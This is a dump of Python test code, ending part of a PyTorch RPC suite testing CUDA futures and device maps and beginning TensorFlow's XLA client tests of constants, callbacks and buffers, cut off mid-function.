@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=True
)
|
xla_client_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend,
cloud_tpu=False,
tfrt_tpu=False,
external_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_] + complex_dtypes
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool_ dtype."""
return np.array(*args, dtype=np.bool_, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testStableComputationSerialization(self):
# Ideally we would test identical computations produced in different
# processes. For now we have this limited smoke test.
computation = self.ExampleComputation()
ref = computation.as_serialized_hlo_module_proto()
for _ in range(10):
self.assertEqual(computation.as_serialized_hlo_module_proto(), ref)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
])
self._ExecuteAndCompareClose(c, expected=[0.75])
tests.append(ComputationsWithConstantsTest)
class PythonCallbackTest(ComputationTest):
def testPythonCallback(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
f = lambda x, y: (x + y, x - y)
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
arg1 = np.array([10, 15, -2, 7], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
p1 = ops.Parameter(c, 1, shape)
out, keepalive = self.backend.emit_python_callback(
f, c, [p0, p1], [shape, shape])
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 + arg1, arg0 - arg1])
del out, keepalive
def testTokens(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x, y):
assert y is None, y
return None, x + 1
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
token_shape = xla_client.Shape.token_shape()
p0 = ops.Parameter(c, 0, shape)
token = ops.CreateToken(c)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0, token], [token_shape, shape])
out = ops.GetTupleElement(out, 1)
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 + 1])
del out, keepalive
def testStriding(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
assert x.flags.f_contiguous, x.strides
# Force the output array to have C layout, which will require a
# transpose back to the expected Fortran layout.
return np.ascontiguousarray(x * 2),
arg0 = np.arange(12, dtype=np.int16).reshape(3, 4)
shape_f_layout = xla_client.Shape.array_shape(
arg0.dtype, arg0.shape, layout=(0, 1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape_f_layout], [shape_f_layout])
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 * 2])
del out, keepalive
tests.append(PythonCallbackTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testXlaShapeIndex(self):
a = xla_client.ShapeIndex((1, 2))
b = xla_client.ShapeIndex((1, 2))
c = xla_client.ShapeIndex((2, 3))
self.assertEqual(a, b)
self.assertNotEqual(b, c)
def testLayout(self):
f32 = xla_client.PrimitiveType.F32
a = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
b = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
c = xla_client.Shape.array_shape(f32, (2, 3), (1, 0)).layout()
self.assertEqual(a.minor_to_major(), (0, 1))
self.assertEqual(b.minor_to_major(), (0, 1))
self.assertEqual(c.minor_to_major(), (1, 0))
self.assertEqual(a, b)
self.assertNotEqual(a, c)
self.assertNotEqual(b, c)
self.assertEqual(hash(a), hash(b))
self.assertNotEqual(hash(a), hash(c))
self.assertNotEqual(hash(b), hash(c))
def testBlockUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_until_ready()
# This test merely checks that nothing goes awry when we call
# block_until_ready(); it's difficult to test anything else.
def testBlockUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
raise unittest.SkipTest(
"The objectof type {} do not extend DeviceArrayBase".format(
type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
buffer.delete()
with self.assertRaises(RuntimeError):
buffer.block_until_ready()
def testOnDeviceSizeInBytes(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
# OnDeviceSizeInBytes varies depending on the platform. Confirm there's
# a reasonable value.
self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)
def testLiveBuffers(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support LiveBuffers().")
self.assertEmpty(self.backend.live_buffers())
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertLen(self.backend.live_buffers(), 3)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
self.assertEqual(self.backend.devices()[0].live_buffers(),
self.backend.live_buffers())
arg1_buffer.delete()
self.assertLen(self.backend.live_buffers(), 2)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
arg0_buffer.delete()
arg2_buffer.delete()
self.assertEmpty(self.backend.live_buffers())
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
def testUnsafeBufferPointer(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
